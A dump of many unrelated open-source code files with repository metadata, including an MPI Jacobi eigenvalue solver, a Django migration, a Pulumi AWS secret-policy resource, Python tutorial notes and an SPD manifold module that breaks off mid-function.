row_j_comm.Scatter(row_j, row_j_part, root=0)
row_j_comm.Scatter(row_k, row_k_part, root=0)
for i in range(size):
row_j_new_part[i] = c * row_j_part[i] + s * row_k_part[i]
row_j_comm.Gather(row_j_new_part, row_j_new, root=0)
if row_j_rank == 0:
comm.Send([row_j_new, sz, MPI.FLOAT], dest=0, tag=0)
row_j_comm.Free()
row_k_rank = row_k_size = -1
row_k_new = np.zeros(sz)
if MPI.COMM_NULL != row_k_comm:
row_k_rank = row_k_comm.Get_rank()
row_k_size = row_k_comm.Get_size()
size = int(sz / row_k_size)
row_j_part = np.zeros(size)
row_k_part = np.zeros(size)
row_k_new_part = np.zeros(size)
row_k_comm.Scatter(row_j, row_j_part, root=0)
row_k_comm.Scatter(row_k, row_k_part, root=0)
for i in range(size):
row_k_new_part[i] = s * row_j_part[i] - c * row_k_part[i]
row_k_comm.Gather(row_k_new_part, row_k_new, root=0)
if row_k_rank == 0:
comm.Send([row_k_new, sz, MPI.FLOAT], dest=0, tag=0)
row_k_comm.Free()
if rank == 0:
status = MPI.Status()
comm.Recv([row_j_new, sz, MPI.FLOAT], source=1, tag=0, status=status)
comm.Recv([row_k_new, sz, MPI.FLOAT], source=2, tag=0, status=status)
A[j, k] = A[k, j] = (c ** 2 - s ** 2) * row_j[k] + s * c * (row_k[k] - row_j[j])
A[j, j] = c ** 2 * row_j[j] + 2 * s * c * row_j[k] + s ** 2 * row_k[k]
A[k, k] = s ** 2 * row_j[j] - 2 * s * c * row_j[k] + c ** 2 * row_k[k]
for i in range(sz):
if i != j and i != k:
A[j, i] = A[i, j] = row_j_new[i]
A[k, i] = A[i, k] = row_k_new[i]
return A
def jacobi_parallel(comm, A, eps):
elapsed_time = 0
i, j = indexes_max_elem(A)
norm = t(A)
rank = comm.Get_rank()
eps = comm.bcast(eps, root=0)
norm = comm.bcast(norm, root=0)
k = 1
while norm > eps:
elapsed_time -= MPI.Wtime()
A = parallel_jacobi_rotate(comm, A, j, i)
if rank == 0:
norm = t(A)
elapsed_time += MPI.Wtime()
norm = comm.bcast(norm, root=0)
i, j = indexes_max_elem(A)
k += 1
return np.diag(A).tolist()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True, help='Input file')
parser.add_argument('--output', required=True, help='Output file')
args = parser.parse_args()
elapsed_time = 0
need_args = ('matrix', 'eps')
init_dict = read_data(args.input, need_args)
A, eps = init_dict['matrix'], init_dict['eps']
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
elapsed_time -= MPI.Wtime()
eig = jacobi_parallel(comm, A, eps)
elapsed_time += MPI.Wtime()
if rank == 0:
save_to_file(args.output, eigenvalues=eig)
print("Dimension {0}, time elapsed {1} sec.\n".format(A.shape[0], elapsed_time))
MPI.Finalize()
|
[
"[email protected]"
] | |
575d02aa9fb79160437e642f6d8501b4b1d3b89c
|
0f556b9d4e250df73bf1e0929dbd4afad51e82fe
|
/person/3/person.py
|
18a8f9d43f414810584c840c8d787016b5ca9207
|
[] |
no_license
|
unabl4/PythonCodeClub
|
0ef1cb4d145860a4fda528c2eea513d0ba6b8327
|
72d5887342c1e0b304307a0e0ac9eb78f0202c35
|
refs/heads/master
| 2021-04-30T04:42:03.266029 | 2019-02-18T22:09:12 | 2019-02-18T22:09:12 | 121,541,065 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 604 |
py
|
from datetime import date
class Person:
def __init__(self, first_name, last_name, birth_date):
self.first_name = first_name
self.last_name = last_name
self.birth_date = birth_date
def age(self):
return int((date.today()-self.birth_date).days // 365.25)
def full_name(self):
return "%s %s" % (self.first_name, self.last_name)
# ---
class Female(Person):
def __init__(self, first_name, last_name, birth_date):
super().__init__(first_name, last_name, birth_date)
def age(self):
age = super().age()
return min(20, age)
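# Usage sketch (not part of the original file):
if __name__ == '__main__':
    ada = Person('Ada', 'Lovelace', date(1815, 12, 10))
    print(ada.full_name(), ada.age())
    eve = Female('Eve', 'Example', date(1990, 1, 1))
    print(eve.full_name(), eve.age())  # Female.age is capped at 20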
|
[
"[email protected]"
] | |
3705d6628ca7f9c0175c12c5e79138b0bc3be4c0
|
1eee2c9c105148904d0fb47cee227cfd20241b76
|
/alpha/alpha_beats_28.py
|
5bfdccc7f1e53b5628dc5209c82fea3bfca59b63
|
[] |
no_license
|
fred-hz/zeta
|
be9f6f466b75767cc1a45a4004d1c84e5d559b6b
|
e7b631447fff6e58928d6ac15702338b7cc8e3e7
|
refs/heads/master
| 2021-09-05T01:03:31.387379 | 2018-01-23T04:15:58 | 2018-01-23T04:15:58 | 118,187,345 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,281 |
py
|
from alpha.alpha_base import AlphaBase
import numpy as np
import util
class AlphaBeats_28(AlphaBase):
def initialize(self):
self.delay = int(self.params['delay'])
self.is_valid = self.context.is_valid
self.alpha = self.context.alpha
self.cps = self.context.fetch_data('adj_close')
self.low = self.context.fetch_data('adj_low')
def compute_day(self, di):
indicator = np.zeros(len(self.context.ii_list))
indicator.flat = np.nan
for ii in range(len(self.context.ii_list)):
if self.is_valid[di][ii]:
                if np.where(~np.isnan(self.low[di - self.delay - np.arange(20), ii]))[0].size == 0:
continue
indicator[ii] = np.nanargmin(self.low[di-self.delay-np.arange(20), ii])
util.rank(indicator)
for ii in range(len(self.context.ii_list)):
if self.is_valid[di][ii]:
temp = np.nanmean(self.cps[di-self.delay-np.arange(5), ii])
if abs(temp) > 1e-5:
                    self.alpha[ii] = (temp - self.cps[di-self.delay][ii]) / temp * (indicator[ii] - 0.5)
def dependencies(self):
self.register_dependency('adj_close')
self.register_dependency('adj_low')
|
[
"[email protected]"
] | |
5f042357ce4755b0b73969f346665bf0304b6569
|
7d8a4d58fc4c5a73ce8c85e513253a86d6290d3b
|
/script.module.eggscrapers/lib/eggscrapers/modules/workers.py
|
0699f6d316130d4fa9ee280485fcae4f73959dcd
|
[] |
no_license
|
bopopescu/icon
|
cda26d4463d264b7e2080da51f29d84cc48dfb81
|
e385a6225dd11b7fea5a11215d655cf5006bb018
|
refs/heads/master
| 2022-01-12T19:00:04.951604 | 2019-07-10T05:35:44 | 2019-07-10T05:35:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 946 |
py
|
# -*- coding: utf-8 -*-
'''
Eggman Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import threading
class Thread(threading.Thread):
    def __init__(self, target, *args):
        # Call the base initializer first: on Python 3 it resets
        # _target/_args, which would clobber values set beforehand.
        threading.Thread.__init__(self)
        self._target = target
        self._args = args
def run(self):
self._target(*self._args)
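# Usage sketch (illustrative):
# t = Thread(some_function, arg1, arg2)
# t.start()
# t.join()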
|
[
"[email protected]"
] | |
9500aa334d1daba13d7d173c5f462b375f143dd5
|
d063684dd03293eb0f980568af088d26ab087dbe
|
/debadmin/migrations/0075_auto_20191108_1225.py
|
dd5f3b44bf87cdc1a4bd8999b7965e71e5bee1f2
|
[] |
no_license
|
abhaysantra/debscientific
|
ce88e5ef44da8d6771c3652ed0ad02900ccd8ed2
|
88ec65616fd24052bbdbba8b00beba85493f5aea
|
refs/heads/master
| 2020-11-26T22:09:33.820247 | 2019-12-20T07:58:43 | 2019-12-20T07:58:43 | 229,213,810 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,072 |
py
|
# Generated by Django 2.2.6 on 2019-11-08 06:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('debadmin', '0074_auto_20191107_1914'),
]
operations = [
migrations.AddField(
model_name='order_details',
name='cancel_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='cancel_reason',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='order_details',
name='deliver_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='return_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='order_details',
name='return_reason',
field=models.TextField(null=True),
),
]
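# Applied like any other migration (illustrative):
#   python manage.py migrate debadmin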
|
[
"[email protected]"
] | |
8f06edb067427872d40d29ef97e33cffafcc5c31
|
56b36ddf920b5f43e922cb84e8f420f1ad91a889
|
/Leetcode/Leetcode-Minimum Area Rectangle.py
|
bac5a430a77fc7b720b63b147c68a99ab884d1bd
|
[] |
no_license
|
chithien0909/Competitive-Programming
|
9ede2072e85d696ccf143118b17638bef9fdc07c
|
1262024a99b34547a3556c54427b86b243594e3c
|
refs/heads/master
| 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 687 |
py
|
from collections import defaultdict
class Solution:
def minAreaRect(self, points) -> int:
if len(points) <= 3: return 0
x= defaultdict(set)
for xC, yC in points:
x[xC].add(yC)
m = float('inf')
for p1 in points:
for p2 in points:
if p1[0] == p2[0] or p1[1] == p2[1]:
continue
else:
if p2[1] in x[p1[0]] and p1[1] in x[p2[0]]:
t = abs(p1[0] - p2[0]) * abs(p1[1]-p2[1])
m = min(t,m)
return m if m < float('inf') else 0
s = Solution()
print(s.minAreaRect([[1,1],[1,3],[3,1],[3,3],[4,1],[4,3]]))
|
[
"[email protected]"
] | |
7a5f37ad2f3ff8cf53a9b3b4ca81d5f74320aa45
|
649078315f93e2d76fad95c59f234701ef055cb8
|
/test/test_baseSubscriber.py
|
820a50160e7e984fa738df7e2c5d59094e7878bd
|
[
"MIT"
] |
permissive
|
jaebradley/nba_player_news
|
207f4555f662c9187e9ab931774a0863556529f8
|
35ac64c369c33f1232fa76bd5bcc1c0704d868bb
|
refs/heads/master
| 2022-11-22T08:25:08.993567 | 2017-06-14T00:36:52 | 2017-06-14T00:36:52 | 89,762,719 | 2 | 0 |
MIT
| 2022-11-11T17:00:18 | 2017-04-29T04:06:01 |
Python
|
UTF-8
|
Python
| false | false | 353 |
py
|
from unittest import TestCase
from nba_player_news.data.subscribers import BaseSubscriber
class TestBaseSubscriber(TestCase):
subscriber = BaseSubscriber(subscription_channel_name="foo")
    def test_process_message_is_not_implemented(self):
        self.assertRaises(NotImplementedError, self.subscriber.process_message, message="bar")
|
[
"[email protected]"
] | |
46dfde8b2041244d6ae133d01572576d6944bc71
|
98f7bb1314330138f0cb9901e764f6da8cd5605b
|
/5_python基础/3_字典.py
|
15720e3b4ac0d7bcd22295c0e97684183fa0bb02
|
[] |
no_license
|
1071183139/biji
|
c964e197ea0845dbfdd98213743130668770f929
|
02c2e6f69ceb557448b959c44723b4bf498e90c9
|
refs/heads/master
| 2022-12-17T06:46:27.920479 | 2019-10-26T12:02:54 | 2019-10-26T12:02:54 | 217,701,979 | 0 | 0 | null | 2022-12-07T23:55:02 | 2019-10-26T11:57:28 |
Python
|
UTF-8
|
Python
| false | false | 2,053 |
py
|
# Access a value by its key
info = {'name': 'class monitor', 'id': 100, 'sex': 'f', 'address': 'Earth, Asia, China, Beijing'}
# print(info['name'])
# print(info['names']) # a missing key raises an error
# get: fetch a value with an optional default; a missing key does not raise
# print(info.get('id'))
# print(info.get('ids', 'no such key'))
# Common operations (modify, add, delete)
# Modify an element
# new_id = input('Please enter a value')
# info['id'] = new_id
# print(info)
# Add an element (second example)
# If the key already exists, the value is modified
# info['id'] = 18
# print(info)
# If the key does not exist, a new element is added.
# info['id'] = 18
# print(info)
# Delete elements (del, clear)
# del info['key'], or del info to delete the whole dictionary
# del info['name']
print(info)
# del info['pp'] # a missing key raises an error
# print(info)
# del info  # both "del info" and "del(info)" work
# print(info) # after deletion the dictionary no longer exists.
# clear empties the dictionary; it still exists, just as an empty dict.
# info.clear()
# print(info) # {}
# Common operations 2 (len, keys, values, items, has_key)
# len counts the key-value pairs in the dictionary
# print(len(info))
# keys returns all of the dictionary's keys
# print(info.keys())
# values returns all of the dictionary's values
# print(info.values())
# items returns all (key, value) tuples
# print(info.items()) # [('name', 'class monitor'), ('id', 100), ('sex', 'f'), ('address', 'Earth, Asia, China, Beijing')]
# in, not in test whether a key is in the dictionary
# print('name' in info)
# Iteration
for item in info.items():
    print(item)
for key, value in info.items():
    print(key, value)
# print(type(key, value))
# Iterating with an index
chars = ['a', 'b', 'c', 'd', 'f']
chars1 = ('a', 'c', 'v', 'd', 'h')
# i = 0
# for chr in chars:
#     print("%d %s" % (i, chr))
#     i += 1
# enumerate works for both lists and tuples.
for i, chr in enumerate(chars1):
    print('%d %s' % (i, chr))
a = (1, 2, 3, 4)
b = ('a', 'b', 'c', 'd')
c = a + b
print(a + b)
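# enumerate can also start counting from a custom index:
for i, chr in enumerate(chars, start=1):
    print('%d %s' % (i, chr))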
|
[
"[email protected]"
] | |
fa14b434145cd963ca27a6eef951a8dff89d13d1
|
62bbfb6c50bba16304202aea96d1de4990f95e04
|
/dependencies/pulumi_aws/secretsmanager/secret_policy.py
|
81618991d5edb3f606dbf67e2ea3567c4dac6497
|
[] |
no_license
|
adriell/lambda-autoservico-storagegateway
|
b40b8717c8de076e61bbd422461c7d624a0d2273
|
f6e3dea61b004b73943a5438c658d3f019f106f7
|
refs/heads/main
| 2023-03-16T14:41:16.821675 | 2021-03-11T03:30:33 | 2021-03-11T03:30:33 | 345,865,704 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,885 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
__all__ = ['SecretPolicy']
class SecretPolicy(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
block_public_policy: Optional[pulumi.Input[bool]] = None,
policy: Optional[pulumi.Input[str]] = None,
secret_arn: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides a resource to manage AWS Secrets Manager secret policy.
## Example Usage
### Basic
```python
import pulumi
import pulumi_aws as aws
example_secret = aws.secretsmanager.Secret("exampleSecret")
example_secret_policy = aws.secretsmanager.SecretPolicy("exampleSecretPolicy",
secret_arn=example_secret.arn,
policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "EnableAllPermissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}
\"\"\")
```
## Import
`aws_secretsmanager_secret_policy` can be imported by using the secret Amazon Resource Name (ARN), e.g.
```sh
$ pulumi import aws:secretsmanager/secretPolicy:SecretPolicy example arn:aws:secretsmanager:us-east-1:123456789012:secret:example-123456
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] block_public_policy: Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
:param pulumi.Input[str] secret_arn: Secret ARN.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['block_public_policy'] = block_public_policy
if policy is None and not opts.urn:
raise TypeError("Missing required property 'policy'")
__props__['policy'] = policy
if secret_arn is None and not opts.urn:
raise TypeError("Missing required property 'secret_arn'")
__props__['secret_arn'] = secret_arn
super(SecretPolicy, __self__).__init__(
'aws:secretsmanager/secretPolicy:SecretPolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
block_public_policy: Optional[pulumi.Input[bool]] = None,
policy: Optional[pulumi.Input[str]] = None,
secret_arn: Optional[pulumi.Input[str]] = None) -> 'SecretPolicy':
"""
Get an existing SecretPolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] block_public_policy: Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
:param pulumi.Input[str] secret_arn: Secret ARN.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["block_public_policy"] = block_public_policy
__props__["policy"] = policy
__props__["secret_arn"] = secret_arn
return SecretPolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="blockPublicPolicy")
def block_public_policy(self) -> pulumi.Output[Optional[bool]]:
"""
Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
"""
return pulumi.get(self, "block_public_policy")
@property
@pulumi.getter
def policy(self) -> pulumi.Output[str]:
return pulumi.get(self, "policy")
@property
@pulumi.getter(name="secretArn")
def secret_arn(self) -> pulumi.Output[str]:
"""
Secret ARN.
"""
return pulumi.get(self, "secret_arn")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
[
"[email protected]"
] | |
553f3d89c11483b36ae1a20c082db45382ae9e15
|
3b786d3854e830a4b46ee55851ca186becbfa650
|
/SystemTesting/pylib/nsx/vsm/edge/edge_sslvpnconfig_schema/edge_sslvpnconfig_layout_configuration_schema.py
|
68a4bace81fb3982ea88b3dfde93326a01c98ec6
|
[] |
no_license
|
Cloudxtreme/MyProject
|
d81f8d38684333c22084b88141b712c78b140777
|
5b55817c050b637e2747084290f6206d2e622938
|
refs/heads/master
| 2021-05-31T10:26:42.951835 | 2015-12-10T09:57:04 | 2015-12-10T09:57:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 885 |
py
|
import base_schema
class SSLVPNConfigLayoutConfigurationSchema(base_schema.BaseSchema):
_schema_name = "layoutConfiguration"
def __init__(self, py_dict=None):
""" Constructor to create
SSLVPNConfigLayoutConfigurationSchema object
@param py_dict : python dictionary to construct this object
"""
super(SSLVPNConfigLayoutConfigurationSchema, self).__init__()
self.set_data_type('xml')
self.portalTitle = None
self.companyName = None
self.logoExtention = None
self.logoUri = None
self.logoBackgroundColor = None
self.titleColor = None
self.topFrameColor = None
self.menuBarColor = None
self.rowAlternativeColor = None
self.bodyColor = None
self.rowColor = None
if py_dict is not None:
self.get_object_from_py_dict(py_dict)
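# Usage sketch (hypothetical values; keys mirror the attributes above):
# layout = SSLVPNConfigLayoutConfigurationSchema(py_dict={
#     'portalTitle': 'Corporate VPN',
#     'companyName': 'Example Inc.',
#     'bodyColor': '#FFFFFF',
# })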
|
[
"[email protected]"
] | |
c47ab8e7d986152e8f436c75f1e649796e2231bb
|
054bc8696bdd429e2b3ba706feb72c0fb604047f
|
/python/utils/CheckInRange/CheckInRange.py
|
b984a85c12b190cb26df2a3aebfbf2bf794a9fde
|
[] |
no_license
|
wavefancy/WallaceBroad
|
076ea9257cec8a3e1c8f53151ccfc7c5c0d7200f
|
fbd00e6f60e54140ed5b4e470a8bdd5edeffae21
|
refs/heads/master
| 2022-02-22T04:56:49.943595 | 2022-02-05T12:15:23 | 2022-02-05T12:15:23 | 116,978,485 | 2 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,555 |
py
|
#!/usr/bin/env python3
"""
Keep/Remove records in range.
@Author: [email protected]
Usage:
CheckInRange.py -r file -c int [-e]
CheckInRange.py -h | --help | -v | --version | -f | --format
Notes:
1. Read content from stdin, and output result to stdout.
2. Column index start from 1.
Options:
-c int Column index for value.
-r file Range file, two columns, range_start range_end.
-e Exclude(Remove) records in defined range, default Include(Keep).
-f --format Show example.
-h --help Show this screen.
-v --version Show version.
"""
import sys
from docopt import docopt
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE,SIG_DFL)
# pip install pyinterval
# https://pyinterval.readthedocs.io/en/latest/install.html
try:
from interval import interval
except:
sys.stderr.write('ERROR for import package "interval"!\nPlease install by "pip install pyinterval"!\n')
sys.exit(-1)
def ShowFormat():
print('''
# input
#-----------------
100 10
1000000 20
5000000 20
7000000 3
10000000 30
#range file:
#-----------------
1000000 5000000
# cat in.txt | python3 CheckInRange.py -r range.txt -c 1
#-----------------
1000000 20
5000000 20
cat in.txt | python3 CheckInRange.py -r range.txt -c 1 -e
#-----------------
100 10
7000000 3
10000000 30
''')
if __name__ == '__main__':
args = docopt(__doc__, version='3.0')
#print(args)
if(args['--format']):
ShowFormat()
sys.exit(-1)
#
colValue = int(args['-c']) -1
keep = True
if args['-e']:
keep = False
irange = interval()
with open(args['-r'],'r') as inf:
for line in inf:
line = line.strip()
if line:
ss = line.split()
irange = irange | interval[float(ss[0]), float(ss[1])]
#-------------------------------------------------
for line in sys.stdin:
line = line.strip()
if line:
ss = line.split()
try:
v = int(ss[colValue])
if keep:
if v in irange:
sys.stdout.write('%s\n'%(line))
else:
if not (v in irange):
sys.stdout.write('%s\n'%(line))
except ValueError:
sys.stderr.write('WARN: parse value error(skiped): %s\n'%(line))
sys.stdout.flush()
sys.stdout.close()
sys.stderr.flush()
sys.stderr.close()
|
[
"[email protected]"
] | |
82a535bcf1ac49a0530f8b1435d3329a2280a09b
|
118124f2e903dab8a425c6d99e7ac8fa6f559aa4
|
/devel/py-repoze.xmliter/files/patch-setup.py
|
ccbbb76a7d9156aabc0ee41314c870b7f15170f0
|
[] |
no_license
|
mneumann/DPorts
|
30b3abfdf58b63698bc66c8614073e3366b5fd71
|
d511cdf563ed8133ea75670bfa6e3e895495fefd
|
refs/heads/master
| 2020-12-26T00:46:41.527700 | 2015-01-27T14:54:22 | 2015-01-27T14:54:22 | 28,131,197 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 431 |
py
|
--- setup.py.orig 2014-09-21 15:40:44 UTC
+++ setup.py
@@ -43,7 +43,7 @@ setup(name='repoze.xmliter',
author_email="[email protected]",
url="http://www.repoze.org",
license="BSD-derived (http://www.repoze.org/LICENSE.txt)",
- packages=find_packages(),
+ packages = ['repoze', 'repoze.xmliter'],
include_package_data=True,
namespace_packages=['repoze'],
zip_safe=False,
|
[
"[email protected]"
] | |
024d663ec6247259c4849e881e211d74a27a846a
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/Generators/PowhegControl/examples/processes/MC15.101010.PowhegPythia8EvtGen_A14NNPDF23_VBF_W_example.py
|
0eed1637cfa4f4c7d9a0b3470d317a5272088e7b
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,095 |
py
|
# Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
#--------------------------------------------------------------
# EVGEN configuration
#--------------------------------------------------------------
evgenConfig.description = "POWHEG+Pythia8 VBF W production with A14 NNPDF2.3 tune."
evgenConfig.keywords = ["SM", "VBF", "W"]
evgenConfig.contact = ["[email protected]"]
# --------------------------------------------------------------
# Load ATLAS defaults for the Powheg VBF_W process
# --------------------------------------------------------------
include("PowhegControl/PowhegControl_VBF_W_Common.py")
# --------------------------------------------------------------
# Generate events
# --------------------------------------------------------------
PowhegConfig.generate()
#--------------------------------------------------------------
# Pythia8 showering with the A14 NNPDF2.3 tune
#--------------------------------------------------------------
include("MC15JobOptions/Pythia8_A14_NNPDF23LO_EvtGen_Common.py")
include("MC15JobOptions/Pythia8_Powheg.py")
|
[
"[email protected]"
] | |
7d77907d67969dbeb7a841f56e36294174ac81b0
|
2e2cb71a102c144427f3a3d4c3f2717472e1a2ac
|
/SPD.py
|
6257cf5234470ceb1b82217a8de233f0b56533d4
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
pdhung3012/RegGNN
|
740af76d90740c38f6be502ed6f9495b6d59a4a8
|
a383562121d205f7bb86751242882b7e815eee3f
|
refs/heads/main
| 2023-07-08T13:43:41.903844 | 2021-08-16T07:55:31 | 2021-08-16T07:55:31 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,128 |
py
|
'''
Tools for computing topological features in Riemannian space.
Code taken from https://morphomatics.github.io/,
created by Felix Ambellan and Martin Hanik and Christoph von Tycowicz, 2021.
'''
import numpy as np
import numpy.random as rnd
import numpy.linalg as la
from scipy.linalg import logm, expm_frechet
from pymanopt.manifolds.manifold import Manifold
from pymanopt.tools.multi import multisym
class SPD(Manifold):
"""Returns the product manifold Sym+(d)^k, i.e., a product of k dxd symmetric positive matrices (SPD).
manifold = SPD(k, d)
Elements of Sym+(d)^k are represented as arrays of size kxdxd where every dxd slice is an SPD matrix, i.e., a
symmetric matrix S with positive eigenvalues.
The Riemannian metric used is the product Log-Euclidean metric that is induced by the standard Euclidean trace
metric; see
Arsigny, V., Fillard, P., Pennec, X., and Ayache., N.
Fast and simple computations on tensors with Log-Euclidean metrics.
"""
def __init__(self, k=1, d=3):
if d <= 0:
raise RuntimeError("d must be an integer no less than 1.")
if k == 1:
self._name = 'Manifold of symmetric positive definite {d} x {d} matrices'.format(d=d, k=k)
elif k > 1:
self._name = 'Manifold of {k} symmetric positive definite {d} x {d} matrices (Sym^+({d}))^{k}'.format(d=d, k=k)
else:
raise RuntimeError("k must be an integer no less than 1.")
self._k = k
self._d = d
def __str__(self):
return self._name
@property
def dim(self):
return int((self._d*(self._d+1)/2) * self._k)
@property
def typicaldist(self):
# typical affine invariant distance
return np.sqrt(self._k * 6)
def inner(self, S, X, Y):
"""product metric"""
return np.sum(np.einsum('...ij,...ij', X, Y))
def norm(self, S, X):
"""norm from product metric"""
return np.sqrt(self.inner(S, X, X))
def proj(self, X, H):
"""orthogonal (with respect to the Euclidean inner product) projection of ambient
vector ((k,3,3) array) onto the tangent space at X"""
return dlog(X, multisym(H))
def egrad2rgrad(self,X,D):
# should be adj_dexp instead of dexp (however, dexp appears to be self-adjoint for symmetric matrices)
return dexp(log_mat(X), multisym(D))
def ehess2rhess(self, X, Hess):
# TODO
return
def exp(self, S, X):
"""Riemannian exponential with base point S evaluated at X"""
assert S.shape == X.shape
# (avoid additional exp/log)
Y = X + log_mat(S)
vals, vecs = la.eigh(Y)
return np.einsum('...ij,...j,...kj', vecs, np.exp(vals), vecs)
retr = exp
def log(self, S, U):
"""Riemannian logarithm with base point S evaluated at U"""
assert S.shape == U.shape
# (avoid additional log/exp)
return log_mat(U) - log_mat(S)
def geopoint(self, S, T, t):
""" Evaluate the geodesic from S to T at time t in [0, 1]"""
assert S.shape == T.shape and np.isscalar(t)
return self.exp(S, t * self.log(S, T))
def rand(self):
S = np.random.random((self._k, self._d, self._d))
return np.einsum('...ij,...kj', S, S)
def randvec(self, X):
Y = self.rand()
y = self.log(X, Y)
return y / self.norm(X, y)
def zerovec(self, X):
return np.zeros((self._k, self._d, self._d))
def transp(self, S, T, X):
"""Parallel transport for Sym+(d)^k.
:param S: element of Symp+(d)^k
:param T: element of Symp+(d)^k
:param X: tangent vector at S
:return: parallel transport of X to the tangent space at T
"""
assert S.shape == T.shape == X.shape
# if X were not in algebra but at tangent space at S
#return dexp(log_mat(T), dlog(S, X))
return X
def eleminner(self, R, X, Y):
"""element-wise inner product"""
return np.einsum('...ij,...ij', X, Y)
def elemnorm(self, R, X):
"""element-wise norm"""
return np.sqrt(self.eleminner(R, X, X))
def projToGeodesic(self, X, Y, P, max_iter=10):
'''
:arg X, Y: elements of Symp+(d)^k defining geodesic X->Y.
:arg P: element of Symp+(d)^k to be projected to X->Y.
:returns: projection of P to X->Y
'''
assert X.shape == Y.shape
assert Y.shape == P.shape
# all tagent vectors in common space i.e. algebra
v = self.log(X, Y)
v /= self.norm(X, v)
w = self.log(X, P)
d = self.inner(X, v, w)
return self.exp(X, d * v)
def pairmean(self, S, T):
assert S.shape == T.shape
return self.exp(S, 0.5 * self.log(S, T))
def dist(self, S, T):
"""Distance function in Sym+(d)^k"""
return self.norm(S, self.log(S,T))
def adjJacobi(self, S, T, t, X):
"""Evaluates an adjoint Jacobi field along the geodesic gam from S to T
:param S: element of the space of differential coordinates
:param T: element of the space of differential coordinates
:param t: scalar in [0,1]
:param X: tangent vector at gam(t)
:return: tangent vector at X
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
U = self.geopoint(S, T, t)
return (1 - t) * self.transp(U, S, X)
def adjDxgeo(self, S, T, t, X):
"""Evaluates the adjoint of the differential of the geodesic gamma from S to T w.r.t the starting point S at X,
i.e, the adjoint of d_S gamma(t; ., T) applied to X, which is en element of the tangent space at gamma(t).
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
return self.adjJacobi(S, T, t, X)
def adjDygeo(self, S, T, t, X):
"""Evaluates the adjoint of the differential of the geodesic gamma from S to T w.r.t the endpoint T at X,
i.e, the adjoint of d_T gamma(t; S, .) applied to X, which is en element of the tangent space at gamma(t).
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
